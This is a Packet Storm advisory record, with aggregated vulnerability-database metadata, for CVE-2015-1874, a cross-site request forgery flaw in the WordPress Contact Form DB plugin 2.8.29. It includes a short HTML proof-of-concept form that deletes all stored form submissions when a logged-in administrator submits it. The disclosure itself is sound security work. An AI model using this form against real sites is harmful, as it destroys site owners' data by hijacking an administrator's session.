WordPress Contact Form DB 2.8.29 Cross Site Request Forgery
2015-03-04T00:00:00
ID PACKETSTORM:130654 Type packetstorm Reporter Tom Adams Modified 2015-03-04T00:00:00
Description
`Details
================
Software: Contact Form DB
Version: 2.8.29
Homepage: https://wordpress.org/plugins/contact-form-7-to-database-extension/
Advisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/
CVE: CVE-2015-1874
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
Description
================
CSRF in Contact Form DB allows attacker to delete all stored form submissions
Vulnerability
================
An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.
Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript).
<form action=\"http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions\" method=\"post\">
<input name=\"all\" type=\"text\" value=\"y\">
<input name=\"delete\" type=\"text\" value=\"y\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 2.8.32 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2015-02-05: Discovered
2015-02-17: Reported to vendor by email
2015-02-22: Vendor responded and agreed a schedule for fix
2015-02-23: Vendor published a fix in version 2.8.32
2015-03-04: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
`
{"id": "PACKETSTORM:130654", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Contact Form DB 2.8.29 Cross Site Request Forgery", "description": "", "published": "2015-03-04T00:00:00", "modified": "2015-03-04T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "href": "https://packetstormsecurity.com/files/130654/WordPress-Contact-Form-DB-2.8.29-Cross-Site-Request-Forgery.html", "reporter": "Tom Adams", "references": [], "cvelist": ["CVE-2015-1874"], "lastseen": "2016-12-05T22:18:14", "viewCount": 14, "enchantments": {"score": {"value": 5.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-1874"]}]}, "exploitation": null, "vulnersScore": 5.8}, "sourceHref": "https://packetstormsecurity.com/files/download/130654/wpcontactformdb-xsrf.txt", "sourceData": "`Details \n================ \nSoftware: Contact Form DB \nVersion: 2.8.29 \nHomepage: https://wordpress.org/plugins/contact-form-7-to-database-extension/ \nAdvisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/ \nCVE: CVE-2015-1874 \nCVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \nDescription \n================ \nCSRF in Contact Form DB allows attacker to delete all stored form submissions \n \nVulnerability \n================ \nAn attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed. \n \nProof of concept \n================ \nIf a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript). \n<form action=\\\"http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions\\\" method=\\\"post\\\"> \n<input name=\\\"all\\\" type=\\\"text\\\" value=\\\"y\\\"> \n<input name=\\\"delete\\\" type=\\\"text\\\" value=\\\"y\\\"> \n<input type=\\\"submit\\\"> \n</form> \n \nMitigations \n================ \nUpgrade to version 2.8.32 or later \n \nDisclosure policy \n================ \ndxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ \n \nPlease contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. \n \nThis vulnerability will be published if we do not receive a response to this report with 14 days. \n \nTimeline \n================ \n \n2015-02-05: Discovered \n2015-02-17: Reported to vendor by email \n2015-02-22: Vendor responded and agreed a schedule for fix \n2015-02-23: Vendor published a fix in version 2.8.32 \n2015-03-04: Advisory published \n \n \n \nDiscovered by dxw: \n================ \nTom Adams \nPlease visit security.dxw.com for more information. \n \n \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645319798}}
{"wpvulndb": [{"lastseen": "2021-02-15T22:16:26", "bulletinFamily": "software", "cvelist": ["CVE-2015-1874"], "description": "The contact-form-7-to-database-extension WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) security vulnerability.\n", "modified": "2019-10-21T13:10:30", "published": "2015-03-04T00:00:00", "id": "WPVDB-ID:F781F36D-8760-4E53-8DD3-7CFBA1D21EE2", "href": "https://wpscan.com/vulnerability/f781f36d-8760-4e53-8dd3-7cfba1d21ee2", "type": "wpvulndb", "title": "Contact Form DB <= 2.8.29 - Cross-Site Request Forgery (CSRF)", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-04-20T20:19:07", "description": "Because of this vulnerability, the attackers can hijack the authentication of administrators for requests that delete all plugin records.\n\n## Solution\n\nUpgrade the plugin.", "cvss3": {}, "published": "2015-02-17T00:00:00", "type": "patchstack", "title": "WordPress Contact Form DB Plugin <= 2.8.31 - CSRF", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1874"], "modified": "2015-02-17T00:00:00", "id": "PATCHSTACK:4BB30869EF860351F4C3F7E5768368C2", "href": "https://patchstack.com/database/vulnerability/contact-form-db/wordpress-contact-form-db-plugin-2-8-31-csrf", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:04:17", "description": "Cross-site request forgery (CSRF) vulnerability in the Contact Form DB (aka CFDB and contact-form-7-to-database-extension) plugin before 2.8.32 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete all plugin records via a request in the CF7DBPluginSubmissions page to wp-admin/admin.php.", "cvss3": {}, "published": "2015-03-09T16:59:00", "type": "cve", "title": "CVE-2015-1874", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1874"], "modified": "2016-08-04T03:17:00", "cpe": ["cpe:/a:cfdbplugin:contact_form_db:2.8.31"], "id": "CVE-2015-1874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1874", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cfdbplugin:contact_form_db:2.8.31:*:*:*:*:wordpress:*:*"]}]}
